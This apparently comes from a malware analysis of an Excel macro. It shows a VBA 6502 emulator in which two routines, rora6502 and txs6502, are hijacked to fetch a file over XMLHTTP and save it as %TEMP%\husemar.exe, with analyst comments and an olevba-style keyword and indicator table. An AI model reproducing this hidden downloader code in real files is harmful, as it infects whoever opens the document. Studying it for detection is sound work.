  666.  Write6502 s + &H100&, (PC \ &H100&)
  667.  s = (s - 1) And &HFF
  668.  Write6502 s + &H100&, (PC And &HFF)
  669.  s = (s - 1) And &HFF
  670.  PC = PC - 1
  671.  adrmode opcode
  672.  PC = savepc
  673. End Sub
  674. Public Sub lda6502()
  675.  adrmode opcode
  676.  A = Read6502(savepc)
  677.  If (A) Then
  678.  P = P And &HFD
  679.  Else
  680.  P = P Or &H2
  681.  End If
  682.  If (A And &H80) Then
  683.  P = P Or &H80
  684.  Else
  685.  P = P And &H7F
  686.  End If
  687. End Sub
  688. Public Sub ldx6502()
  689.  adrmode opcode
  690.  X = Read6502(savepc)
  691.  If (X) Then
  692.  P = P And &HFD
  693.  Else
  694.  P = P Or &H2
  695.  End If
  696.  If (X And &H80) Then
  697.  P = P Or &H80
  698.  Else
  699.  P = P And &H7F
  700.  End If
  701. End Sub
  702. Public Sub ldy6502()
  703.  adrmode opcode
  704.  Y = Read6502(savepc)
  705.  If (Y) Then
  706.  P = P And &HFD
  707.  Else
  708.  P = P Or &H2
  709.  End If
  710.  If (Y And &H80) Then
  711.  P = P Or &H80
  712.  Else
  713.  P = P And &H7F
  714.  End If
  715. End Sub
  716. Public Sub lsr6502()
  717.  adrmode opcode
  718.  Value = Read6502(savepc)
  719.  P = ((P And &HFE) Or (Value And &H1))
  720.  Value = (Value \ 2) And &HFF
  721.  Write6502 savepc, (Value And &HFF)
  722.  If (Value) Then
  723.  P = P And &HFD
  724.  Else
  725.  P = P Or &H2
  726.  End If
  727.  If (Value And &H80) Then
  728.  P = P Or &H80
  729.  Else
  730.  P = P And &H7F
  731.  End If
  732. End Sub
  733. Public Sub lsra6502()
  734.  P = (P And &HFE) Or (A And &H1)
  735.  A = (A \ 2) And &HFF
  736.  If (A) Then
  737.  P = P And &HFD
  738.  Else
  739.  P = P Or &H2
  740.  End If
  741.  If (A And &H80) Then
  742.  P = P Or &H80
  743.  Else
  744.  P = P And &H7F
  745.  End If
  746. End Sub
  747. Public Sub nop6502()
  748. 'TS: Implemented complex code structure ;)
  749. End Sub
  750. Public Sub ora6502()
  751.  adrmode opcode
  752.  A = A Or Read6502(savepc)
  753.  If (A) Then
  754.  P = P And &HFD
  755.  Else
  756.  P = P Or &H2
  757.  End If
  758.  If (A And &H80) Then
  759.  P = P Or &H80
  760.  Else
  761.  P = P And &H7F
  762.  End If
  763. End Sub
  764. Public Sub pha6502()
  765.  Write6502 &H100& + s, A
  766.  s = (s - 1) And &HFF
  767. End Sub
  768. Public Sub php6502()
  769.  Write6502 &H100& + s, P
  770.  s = (s - 1) And &HFF
  771. End Sub
  772. Public Sub pla6502()
  773.  s = (s + 1) And &HFF
  774.  A = Read6502(s + &H100)
  775.  If (A) Then
  776.  P = P And &HFD
  777.  Else
  778.  P = P Or &H2
  779.  End If
  780.  If (A And &H80) Then
  781.  P = P Or &H80
  782.  Else
  783.  P = P And &H7F
  784.  End If
  785. End Sub
  786. Public Sub plp6502()
  787.  s = (s + 1) And &HFF
  788.  P = Read6502(s + &H100) Or &H20
  789. End Sub
  790. Public Sub rol6502()
  791.  saveflags = (P And &H1)
  792.  adrmode opcode
  793.  Value = Read6502(savepc)
  794.  P = (P And &HFE) Or ((Value \ 128) And &H1)
  795.  Value = (Value * 2) And &HFF
  796.  Value = Value Or saveflags
  797.  Write6502 savepc, (Value And &HFF)
  798.  If (Value) Then
  799.  P = P And &HFD
  800.  Else
  801.  P = P Or &H2
  802.  End If
  803.  If (Value And &H80) Then
  804.  P = P Or &H80
  805.  Else
  806.  P = P And &H7F
  807.  End If
  808. End Sub
  809. Public Sub rola6502()
  810.  saveflags = (P And &H1)
  811.  P = (P And &HFE) Or ((A \ 128) And &H1)
  812.  A = (A * 2) And &HFF
  813.  A = A Or saveflags
  814.  If (A) Then
  815.  P = P And &HFD
  816.  Else
  817.  P = P Or &H2
  818.  End If
  819.  If (A And &H80) Then
  820.  P = P Or &H80
  821.  Else
  822.  P = P And &H7F
  823.  End If
  824. End Sub
  825. Public Sub ror6502()
  826.  saveflags = (P And &H1)
  827.  adrmode opcode
  828.  Value = Read6502(savepc)
  829.  P = (P And &HFE) Or (Value And &H1)
  830.  Value = (Value \ 2) And &HFF
  831.  If (saveflags) Then
  832.  Value = Value Or &H80
  833.  End If
  834.  Write6502 (savepc), Value And &HFF
  835.  If (Value) Then
  836.  P = P And &HFD
  837.  Else
  838.  P = P Or &H2
  839.  End If
  840.  If (Value And &H80) Then
  841.  P = P Or &H80
  842.  Else
  843.  P = P And &H7F
  844.  End If
  845. End Sub
  846. Public Sub rora6502()
       ' Hijacked emulator routine and fourth call in the Workbook_Open chain: the statements
       ' before Exit Sub write the downloaded bytes to disk; the rotate-right code after it is
       ' unreachable filler.
  847.  
  848. Dim rti6611 As Variant
       ' phy65007 is the Microsoft.XMLHTTP object; its request was sent in txs6502.
  849. rti6611 = phy65007.responseBody
  850. Dim rti6612 As Integer
       ' Evaluates to 2, which ADO defines as adSaveCreateOverWrite; writing it as an
       ' expression keeps the literal 2 out of the SaveToFile call.
  851. rti6612 = 3 - 1
       ' phy65008 is the ADODB.Stream opened in binary mode by txs6502; phy650002 is the
       ' %TEMP%\husemar.exe path, so an existing file of that name is overwritten.
  852.     phy65008.write rti6611
  853.     phy65008.savetofile phy650002, rti6612
  854. Exit Sub
       ' Unreachable after Exit Sub: the original emulator body.
  855.  saveflags = (P And &H1)
  856.  P = (P And &HFE) Or (A And &H1)
  857.  A = (A \ 2) And &HFF
  858.  If (saveflags) Then
  859.  A = A Or &H80
  860.  End If
  861.  If (A) Then
  862.  P = P And &HFD
  863.  Else
  864.  P = P Or &H2
  865.  End If
  866.  If (A And &H80) Then
  867.  P = P Or &H80
  868.  Else
  869.  P = P And &H7F
  870.  End If
  871. End Sub
  872. Public Sub rti6502()
  873.  
  874.  s = (s + 1) And &HFF
  875.  P = Read6502(s + &H100&) Or &H20
  876.  s = (s + 1) And &HFF
  877.  PC = Read6502(s + &H100&)
  878.  s = (s + 1) And &HFF
  879.  PC = PC + (Read6502(s + &H100) * &H100&)
  880. End Sub
  881. Public Sub rts6502()
  882.  s = (s + 1) And &HFF
  883.  PC = Read6502(s + &H100)
  884.  s = (s + 1) And &HFF
  885.  PC = PC + (Read6502(s + &H100) * &H100&)
  886.  PC = PC + 1
  887. End Sub
  888. Public Sub sbc6502()
  889.  adrmode opcode
  890.  Value = Read6502(savepc) Xor &HFF
  891.  saveflags = (P And &H1)
  892.  Sum = A
  893.  Sum = (Sum + Value) And &HFF
  894.  Sum = (Sum + (saveflags * 16)) And &HFF
  895.  If ((Sum > &H7F) Or (Sum <= -&H80)) Then
  896.  P = P Or &H40
  897.  Else
  898.  P = P And &HBF
  899.  End If
  900.  Sum = A + (Value + saveflags)
  901.  If (Sum > &HFF) Then
  902.  P = P Or &H1
  903.  Else
  904.  P = P And &HFE
  905.  End If
  906.  A = Sum And &HFF
  907.  If (P And &H8) Then
  908.  A = (A - &H66) And &HFF
  909.  P = P And &HFE
  910.  If ((A And &HF) > &H9) Then
  911.  A = (A + &H6) And &HFF
  912.  End If
  913.  If ((A And &HF0) > &H90) Then
  914.  A = (A + &H60) And &HFF
  915.  P = P Or &H1
  916.  End If
  917.  Else
  918.  clockticks6502 = clockticks6502 + 1
  919.  End If
  920.  'Debug.Print "sbc6502"
  921. If (A) Then
  922.  P = P And &HFD
  923.  Else
  924.  P = P Or &H2
  925.  End If
  926.  If (A And &H80) Then
  927.  P = P Or &H80
  928.  Else
  929.  P = P And &H7F
  930.  End If
  931. End Sub
  932. Public Sub sec6502()
  933.  P = P Or &H1
  934. End Sub
  935. Public Sub sed6502()
  936.  P = P Or &H8
  937. End Sub
  938. Public Sub sei6502()
  939.  P = P Or &H4
  940. End Sub
  941. Public Sub sta6502()
  942.  adrmode opcode
  943.  Write6502 (savepc), A
  944. End Sub
  945. Public Sub stx6502()
  946.  adrmode opcode
  947.  Write6502 (savepc), X
  948. End Sub
  949. Public Sub sty6502()
  950.  adrmode opcode
  951.  Write6502 (savepc), Y
  952. End Sub
  953. Public Sub tax6502()
  954.  X = A
  955.  If (X) Then
  956.  P = P And &HFD
  957.  Else
  958.  P = P Or &H2
  959.  End If
  960.  If (X And &H80) Then
  961.  P = P Or &H80
  962.  Else
  963.  P = P And &H7F
  964.  End If
  965. End Sub
  966. Public Sub tay6502()
  967.  Y = A
  968.  If (Y) Then
  969.  P = P And &HFD
  970.  Else
  971.  P = P Or &H2
  972.  End If
  973.  If (Y And &H80) Then
  974.  P = P Or &H80
  975.  Else
  976.  P = P And &H7F
  977.  End If
  978. End Sub
  979. Public Sub tsx6502()
  980.  X = s
  981.  If (X) Then
  982.  P = P And &HFD
  983.  Else
  984.  P = P Or &H2
  985.  End If
  986.  If (X And &H80) Then
  987.  P = P Or &H80
  988.  Else
  989.  P = P And &H7F
  990.  End If
  991. End Sub
  992. Public Sub txa6502()
  993.  A = X
  994.  If (A) Then
  995.  P = P And &HFD
  996.  Else
  997.  P = P Or &H2
  998.  End If
  999.  If (A And &H80) Then
  1000.  P = P Or &H80
  1001.  Else
  1002.  P = P And &H7F
  1003.  End If
  1004. End Sub
  1005. Public Sub txs6502()
        ' Hijacked emulator routine and third call in the Workbook_Open chain: sends the HTTP
        ' request, builds the drop path and opens the output stream. The original one-line body
        ' (s = X) sits after Exit Sub and never runs.
        ' phy65009 is WScript.Shell.Environment("Process"), so this reads the TEMP variable.
  1006. phy650001 = phy65009("TEMP")
        ' Sends the GET prepared in PreencherDireita; that Open call passed False for async,
        ' so this call blocks until the response has arrived.
  1007. phy65007.Send
        ' The file name is concatenated from fragments so "husemar.exe" never appears as one
        ' literal; olevba's summary still recovers it as an IOC.
  1008. phy650002 = phy650001 + "\" + "husemar." + "e" + "xe"
  1009. With phy65008
        ' Type 1 is adTypeBinary in ADO: the stream will hold raw bytes, not text.
  1010.    .Type = 1
  1011.    .Open
  1012. End With
  1013. Exit Sub
  1014.  s = X
  1015. End Sub
  1016. Public Sub tya6502()
  1017.  A = Y
  1018.  If (A) Then
  1019.  P = P And &HFD
  1020.  Else
  1021.  P = P Or &H2
  1022.  End If
  1023.  If (A And &H80) Then
  1024.  P = P Or &H80
  1025.  Else
  1026.  P = P And &H7F
  1027.  End If
  1028. End Sub
  1029. Public Sub bra6502()
  1030.  adrmode opcode
  1031.  PC = PC + savepc
  1032.  clockticks6502 = clockticks6502 + 1
  1033. End Sub
  1034. Public Sub dea6502()
  1035.  A = (A - 1) And &HFF
  1036.  If (A) Then
  1037.  P = P And &HFD
  1038.  Else
  1039.  P = P Or &H2
  1040.  End If
  1041.  If (A And &H80) Then
  1042.  P = P Or &H80
  1043.  Else
  1044.  P = P And &H7F
  1045.  End If
  1046. End Sub
  1047. Public Sub ina6502()
  1048.  A = (A + 1) And &HFF
  1049.  If (A) Then
  1050.  P = P And &HFD
  1051.  Else
  1052.  P = P Or &H2
  1053.  End If
  1054.  If (A And &H80) Then
  1055.  P = P Or &H80
  1056.  Else
  1057.  P = P And &H7F
  1058.  End If
  1059. End Sub
  1060. Public Sub phx6502()
  1061.  Write6502 &H100 + s, X
  1062.  s = (s - 1) And &HFF
  1063. End Sub
  1064. Public Sub plx6502()
  1065.  s = (s + 1) And &HFF
  1066.  X = Read6502(s + &H100)
  1067.  If (X) Then
  1068.  P = P And &HFD
  1069.  Else
  1070.  P = P Or &H2
  1071.  End If
  1072.  If (X And &H80) Then
  1073.  P = P Or &H80
  1074.  Else
  1075.  P = P And &H7F
  1076.  End If
  1077. End Sub
  1078. Public Sub phy6502()
  1079.  Write6502 &H100 + s, Y
  1080.  s = (s - 1) And &HFF
  1081. End Sub
  1082. Public Sub ply6502()
  1083.  s = (s + 1) And &HFF
  1084.  Y = Read6502(s + &H100)
  1085.  If (Y) Then
  1086.  P = P And &HFD
  1087.  Else
  1088.  P = P Or &H2
  1089.  End If
  1090.  If (Y And &H80) Then
  1091.  P = P Or &H80
  1092.  Else
  1093.  P = P And &H7F
  1094.  End If
  1095. End Sub
  1096.  
  1097.  
  1098.  
  1099.  
  1100. +------------+----------------------+-----------------------------------------+
  1101. | Type       | Keyword              | Description                             |
  1102. +------------+----------------------+-----------------------------------------+
  1103. | AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
  1104. | Suspicious | Open                 | May open a file                         |
  1105. | Suspicious | Shell                | May run an executable file or a system  |
  1106. |            |                      | command                                 |
  1107. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  1108. |            |                      | command                                 |
  1109. | Suspicious | Run                  | May run an executable file or a system  |
  1110. |            |                      | command                                 |
  1111. | Suspicious | Shell.Application    | May run an application (if combined     |
  1112. |            |                      | with CreateObject)                      |
  1113. | Suspicious | CreateObject         | May create an OLE object                |
  1114. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  1115. |            |                      | strings                                 |
  1116. | Suspicious | Xor                  | May attempt to obfuscate specific       |
  1117. |            |                      | strings                                 |
  1118. | Suspicious | ADODB.Stream         | May create a text file                  |
  1119. | Suspicious | SaveToFile           | May create a text file                  |
  1120. | Suspicious | Write                | May write to a file (if combined with   |
  1121. |            |                      | Open)                                   |
  1122. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  1123. |            |                      | (obfuscation: VBA expression)           |
  1124. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  1125. |            |                      | be used to obfuscate strings (option    |
  1126. |            |                      | --decode to see all)                    |
  1127. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  1128. |            |                      | may be used to obfuscate strings        |
  1129. |            |                      | (option --decode to see all)            |
  1130. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  1131. |            | Strings              | may be used to obfuscate strings        |
  1132. |            |                      | (option --decode to see all)            |
  1133. | IOC        | husemar.exe          | Executable file name (obfuscation: VBA  |
  1134. |            |                      | expression)                             |
  1135. | VBA string | Microsoft.XMLHTTP    | ("Microsoft" + ".XMLHTTP")              |
  1136. | VBA string | Das Modell kann nun  | "Das Modell kann nun bearbeitet werden. |
  1137. |            | bearbeitet werden.   | " &  "Ge?nderte Default-Werte werden    |
  1138. |            | Ge?nderte Default-   | beim Schliessen exportiert."            |
  1139. |            | Werte werden beim    |                                         |
  1140. |            | Schliessen           |                                         |
  1141. |            | exportiert.          |                                         |
  1142. | VBA string | \husemar.exe         | "\" + "husemar." + "e" + "xe"           |
  1143. +------------+----------------------+-----------------------------------------+